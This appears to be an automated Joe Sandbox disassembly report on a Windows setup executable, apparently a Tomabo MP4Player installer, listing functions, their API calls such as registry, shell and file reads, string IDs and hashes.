                                                                                                                                                                                                  Function 004382AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004382B2
                                                                                                                                                                                                    • Part of subcall function 00437D76: __EH_prolog.LIBCMT ref: 00437D7B
                                                                                                                                                                                                    • Part of subcall function 004B20BD: lstrlenW.KERNEL32(00000000,?,?,004B1CC0,?,?,00403D3C,00000000,?,?,00403D1B,?,?,?,?,00403D01), ref: 004B20CE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$lstrlen
                                                                                                                                                                                                  • String ID: aac_adtstoasc$concat$copy
                                                                                                                                                                                                  • API String ID: 3243491680-1557367015
                                                                                                                                                                                                  • Opcode ID: 0d2ba9c0a9a13668a54af4d0c8ea16c84c5d3f318ab7096a0ea66635d750b20a
                                                                                                                                                                                                  • Instruction ID: f1ade38cd9e8668c68e3fe14fbaa5e0c651bb8ade55481671895b5bd0dac48fd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d2ba9c0a9a13668a54af4d0c8ea16c84c5d3f318ab7096a0ea66635d750b20a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5221CD31A00219AFCB34EF55CD92EEDB770AF08308F1000AEF64662290DFB95E45CB19
                                                                                                                                                                                                  Function 0040D59E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040D5A3
                                                                                                                                                                                                    • Part of subcall function 0041C59D: __EH_prolog.LIBCMT ref: 0041C5A2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: %s.%s%s$MP4Player$Tomabo
                                                                                                                                                                                                  • API String ID: 3519838083-2079911099
                                                                                                                                                                                                  • Opcode ID: a4a33f70646ac19fd81702855e24fac8bb74626ab651156e591efeca5679afa6
                                                                                                                                                                                                  • Instruction ID: 93f07687206de2ab11bb54a0964612f6b33dd725ff148aa5dca0cadbb260788b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4a33f70646ac19fd81702855e24fac8bb74626ab651156e591efeca5679afa6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D811A372900219BBCF04EBDACC05FEEBB74BF14314F10452EB425A3191DBB99A14D769
                                                                                                                                                                                                  Function 00420A8D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00420A92
                                                                                                                                                                                                    • Part of subcall function 0042153F: __EH_prolog.LIBCMT ref: 00421544
                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000001,00000000,?,?,?,Software\Classes\CLSID\%s,?), ref: 00420ACD
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00420AF7
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Software\Classes\CLSID\%s, xrefs: 00420AAC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$CloseCreateDecrementInterlocked
                                                                                                                                                                                                  • String ID: Software\Classes\CLSID\%s
                                                                                                                                                                                                  • API String ID: 1622650550-3302616724
                                                                                                                                                                                                  • Opcode ID: 93f4ed1151a81565849e5f977872057150cbca9691bce1b0980bc746a34e0315
                                                                                                                                                                                                  • Instruction ID: d98bbd0ce6b85126162f18631f951b013c1cf60c17ac590b801265f395082e72
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93f4ed1151a81565849e5f977872057150cbca9691bce1b0980bc746a34e0315
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44016131A10129AACF10DBA6DD49EEFBF78EF05764F50062AF021E20D1D7754605C6A5
                                                                                                                                                                                                  Function 0041D44C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041D451
                                                                                                                                                                                                    • Part of subcall function 0041D19A: GetShortPathNameW.KERNEL32(?,00000000,000007FF), ref: 0041D1D1
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,00000000,explorer.exe,00000000,00000000,00000001), ref: 0041D4B5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExecuteH_prologNamePathShellShort
                                                                                                                                                                                                  • String ID: /select,"%s"$explorer.exe
                                                                                                                                                                                                  • API String ID: 4011813441-3683321831
                                                                                                                                                                                                  • Opcode ID: c281e3ab5816b88c0c75df0548d2431d1a3daf66df89f45728d00cb50b3a8fc4
                                                                                                                                                                                                  • Instruction ID: fdee19df1239073c361282a8f85b11776bebce52d52e3ecd5f339a8815315ea9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c281e3ab5816b88c0c75df0548d2431d1a3daf66df89f45728d00cb50b3a8fc4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16115BB090020EAEDF04EBA1DD85EFEBB78FF14358F60452EB411621A1DB795E08CA64
                                                                                                                                                                                                  Function 00414A6C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00414A71
                                                                                                                                                                                                    • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00FF00FF,000000DD), ref: 00414ACF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ImageList_$CreateH_prologMasked
                                                                                                                                                                                                  • String ID: <L$VGL
                                                                                                                                                                                                  • API String ID: 81051414-514139165
                                                                                                                                                                                                  • Opcode ID: d25c08a838fcf9e829e093a285da2bedf198c01a7c4e150225ed23b75c1d5a65
                                                                                                                                                                                                  • Instruction ID: 7a98cd0916257a7a7ea27b1dfb31bfd8ab50ae63ddcc3070286ce99856c9ae45
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d25c08a838fcf9e829e093a285da2bedf198c01a7c4e150225ed23b75c1d5a65
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C018471590609AADB14DBA1CD06FFE73B4AF14318F20461FB121B21D1DBFC9E048669
                                                                                                                                                                                                  Function 004012B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004012BD
                                                                                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 004012C5
                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 004012D5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$Stock
                                                                                                                                                                                                  • String ID: Tahoma
                                                                                                                                                                                                  • API String ID: 1996491644-3580928618
                                                                                                                                                                                                  • Opcode ID: 400f672a75e37640fbe65fa224d46fb3a10987ca09ef0562b8b36577cfda5645
                                                                                                                                                                                                  • Instruction ID: 24037335a8bc220ab76c8a1de525a884eb314a5dbcc0dfb6aaa0ece5b58e74f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 400f672a75e37640fbe65fa224d46fb3a10987ca09ef0562b8b36577cfda5645
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89F027B76013077AF92016625C46F6B2BACCF80BA1F04043BFB00FA2D4DBB89C424678
                                                                                                                                                                                                  Function 00411656 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(USER32.DLL), ref: 0041165E
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UpdateLayeredWindow), ref: 0041166E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: USER32.DLL$UpdateLayeredWindow
                                                                                                                                                                                                  • API String ID: 1646373207-2914979848
                                                                                                                                                                                                  • Opcode ID: ed35c8285d8d9e1e7387e3b2deb10e0faa9c8185eab0763184a3de5dc6497a9a
                                                                                                                                                                                                  • Instruction ID: 80c039138614cf4ed0b5f9c3d8497f52df943aa376e78e92a2aa118b1f6e38a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed35c8285d8d9e1e7387e3b2deb10e0faa9c8185eab0763184a3de5dc6497a9a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26E0C23224024ABB9F025FE29C04EEA3F6AEB18755B044061FE1891030D73BD870AB58
                                                                                                                                                                                                  Function 0041D5D1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(USER32,ChangeWindowMessageFilter), ref: 0041D5DB
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041D5E2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: ChangeWindowMessageFilter$USER32
                                                                                                                                                                                                  • API String ID: 1646373207-248887387
                                                                                                                                                                                                  • Opcode ID: b48c39b8c50d39a52fe6e676752571536bd972ba0636c313570aaa8384314e66
                                                                                                                                                                                                  • Instruction ID: c9d39129b6be10a1a1e331e6796f9c68c030495713b692bf8dd07ddc021f019e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b48c39b8c50d39a52fe6e676752571536bd972ba0636c313570aaa8384314e66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE0C2F07903432AEB201F729C0AF9B3684AB80B22F2806727E19C01F5DBECC4C0A11D
                                                                                                                                                                                                  Function 0041D535 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(shlwapi.dll,0041D51D,?,?,00000000,000000FF), ref: 0041D53A
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,StrFormatByteSizeW), ref: 0041D54A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: StrFormatByteSizeW$shlwapi.dll
                                                                                                                                                                                                  • API String ID: 1646373207-185409461
                                                                                                                                                                                                  • Opcode ID: b203fed92501ed053aaf1bb69547acbfcb2e89e3d492f8f70d0da35cbef85442
                                                                                                                                                                                                  • Instruction ID: 2e8d10b274debed8895be0b270c0cfc3e86524b0f6d0243191e10ae1b7e091bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b203fed92501ed053aaf1bb69547acbfcb2e89e3d492f8f70d0da35cbef85442
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D017712443C2ABDF028FA28C04E1B7BAABB80746F240C69B960C1060DB29D018AA09
                                                                                                                                                                                                  Function 00411621 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(USER32.DLL,004116CA,0000E90A,00000000,?,00000002), ref: 00411626
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 00411636
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: SetLayeredWindowAttributes$USER32.DLL
                                                                                                                                                                                                  • API String ID: 1646373207-3073883528
                                                                                                                                                                                                  • Opcode ID: a2c14b7b69bec452ca353ae96697d4451319434a8970597fe0a92918df3826db
                                                                                                                                                                                                  • Instruction ID: bde9565b2693d460876b8f24ebcc5819461b521e0d5bf4f494051f1a0495bf1c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2c14b7b69bec452ca353ae96697d4451319434a8970597fe0a92918df3826db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6D05E71244393AB8F018FB2CC04E6B7AA9BF90743F080C6DB960C1070DB2AC118AB0E
                                                                                                                                                                                                  Function 00499461 Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2f2f0478cb90aeb6b040e367a9566f242fac6388cdb383537fb241f1d1cabe17
                                                                                                                                                                                                  • Instruction ID: f18d8c5aca745e7118a3682bb7c42d2371121375998e048df9a84a79eced6fc5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f2f0478cb90aeb6b040e367a9566f242fac6388cdb383537fb241f1d1cabe17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA91E672D01114AADF21AFAEDC81A9F7F78EB54364F24057FF814A6290D7398D408B6D
                                                                                                                                                                                                  Function 004A1A66 Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadFile.KERNEL32(0000010C,0000010C,00000000,0000010C,00000000,00000001,?,?), ref: 004A1AE0
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004A1AEA
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000001,0000010C,00000000), ref: 004A1BB0
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004A1BBA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
